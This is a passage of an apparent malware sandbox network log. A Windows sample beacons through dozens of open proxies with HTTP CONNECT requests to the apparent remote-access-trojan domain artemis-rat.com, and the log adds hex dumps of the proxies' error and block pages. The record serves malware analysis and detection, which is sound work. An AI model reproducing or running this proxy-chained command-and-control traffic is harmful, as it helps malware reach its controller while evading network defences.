72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1721192.168.2.45522145.195.149.7910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.547323942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1722192.168.2.45522483.243.92.15480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.640203953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1723192.168.2.45486095.66.138.2188807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.646754026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1724192.168.2.455227171.250.218.11310807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.650105000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1725192.168.2.455225103.63.190.7280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.650105953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1726192.168.2.45522858.234.116.19781937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.650388956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1727192.168.2.45373751.15.139.15163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.662868977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.663369894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.757179976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.866805077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.866194010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.866216898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.881844997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:38.006872892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:40.539978981 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1728192.168.2.45345472.169.67.17877284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.692502022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.791152954 CET766INHTTP/1.0 514 Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported
                                              Content-type: text/html
                                              Content-length: 630
                                              Data Raw: 3c 54 49 54 4c 45 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 54 49 54 4c 45 3e 3c 42 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 61 72 69 61 6c 20 63 6f 6c 6f 72 3d 23 33 36 34 32 61 32 3e 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 45 72 72 6f 72 20 28 35 31 34 29 20 2d 20 50 72 6f 78 69 65 64 20 48 54 54 50 53 20 52 65 71 75 65 73 74 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 66 6f 6e 74 3e 3c 2f 42 3e 3c 66 6f 6e 74 20 73 74 79 6c 65 3d 6e 6f 72 6d 61 6c 20 66 61 63 65 3d 61 72 69 61 6c 20 73 69 7a 65 3d 32 70 78 3e 3c 50 3e 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 20 66 72 6f 6d 20 61 20 62 72 6f 77 73 65 72 20 77 68 65 6e 3a 20 3c 50 3e 20 3c 55 4c 3e 3c 4c 49 3e 20 54 68 65 20 62 72 6f 77 73 65 72 20 69 73 20 70 72 6f 78 69 65 64 20 74 6f 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 66 6f 72 20 73 65 63 75 72 65 20 72 65 71 75 65 73 74 73 20 28 48 54 54 50 53 29 2c 20 61 6e 64 20 3c 4c 49 3e 20 54 68 65 20 57 65 62 20 41 63 63 65 6c 65 72 61 74 69 6f 6e 20 43 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 77 69 74 68 20 61 20 70 72 6f 78 79 20 73 65 72 76 65 72 2c 20 61 6e 64 20 3c 4c 49 3e 20 53 53 4c 42 20 69 73 20 64 69 73 61 62 6c 65 64 20 3c 2f 55 4c 3e 3c 50 3e 20 54 6f 20 63 6f 72 72 65 63 74 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 2c 20 79 6f 75 20 6d 75 73 74 20 72 65 6d 6f 76 65 20 74 68 65 20 70 72 6f 78 79 20 73 65 74 74 69 6e 67 73 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 50 3e 3c 2f 66 6f 6e 74 3e
                                              Data Ascii: <TITLE>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</TITLE><B><font face=arial color=#3642a2>Web Acceleration Client Error (514) - Proxied HTTPS Request Not Supported</font></B><font style=normal face=arial size=2px><P>The Web Acceleration Client does not support secure requests (HTTPS) from a browser when: <P> <UL><LI> The browser is proxied to Web Acceleration Client for secure requests (HTTPS), and <LI> The Web Acceleration Client is not configured with a proxy server, and <LI> SSLB is disabled </UL><P> To correct this problem, you must remove the proxy settings from your browser.</P></font>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1729192.168.2.45522945.11.95.16560097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.716336966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.063210011 CET228INHTTP/1.0 502 Bad Gateway
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1730192.168.2.45373541.33.219.13019767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.723258972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.866369009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866647005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.867010117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.866187096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.866385937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.882397890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1731192.168.2.45523145.11.95.16560107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.744781017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1732192.168.2.454158125.227.225.15733897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.759769917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1733192.168.2.455233120.76.42.20988887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.776192904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.108104944 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                              Mar 11, 2024 08:37:26.108671904 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.21.6
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1734192.168.2.455234103.83.232.122807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.847354889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1735192.168.2.453825213.136.78.200199257284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.885025024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.906363010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.037641048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.053992033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:50.069431067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.084944010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:14.131880999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1736192.168.2.45499537.187.77.58313557284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.890002966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.659934998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1737192.168.2.455055104.16.106.154807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.890296936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
